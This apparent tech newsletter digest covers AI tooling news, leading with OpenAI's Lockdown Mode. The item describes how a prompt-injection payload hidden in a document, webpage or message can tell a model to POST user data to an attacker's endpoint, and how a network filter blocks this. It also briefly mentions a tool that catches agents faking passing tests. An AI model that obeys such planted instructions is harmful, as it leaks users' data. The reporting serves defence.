This week's tooling news splits cleanly between defense and deployment: OpenAI shipped a deterministic network layer that actually closes a real attack vector, and Google dropped Gemma 4 checkpoints small enough to run on a phone without the quality hit that usually comes with post-training quantization. Alongside those, there's a PR auditor that catches the specific ways AI agents fake passing tests, a memory layer that keeps coding agents grounded to your actual codebase, and a Vercel billing change worth modeling before your next billing cycle.
OpenAI Blocks Data Exfiltration in Lockdown Mode
Lockdown Mode restricts outbound network requests from ChatGPT, cutting off the exfiltration path that makes prompt injection attacks genuinely dangerous. Without it, a malicious payload in untrusted content—a document, a webpage, a user message—can instruct the model to POST your data to an attacker-controlled endpoint. With Lockdown Mode enabled, that network call doesn't go out.
The reason this matters more than most AI safety features: it's not ML-based. There's no classifier to jailbreak, no embedding to confuse. It's a network filter—deterministic, auditable, and not subject to adversarial prompting. That makes it one of the few mitigations in this space that you can actually rely on. It's rolling out across all ChatGPT tiers now.
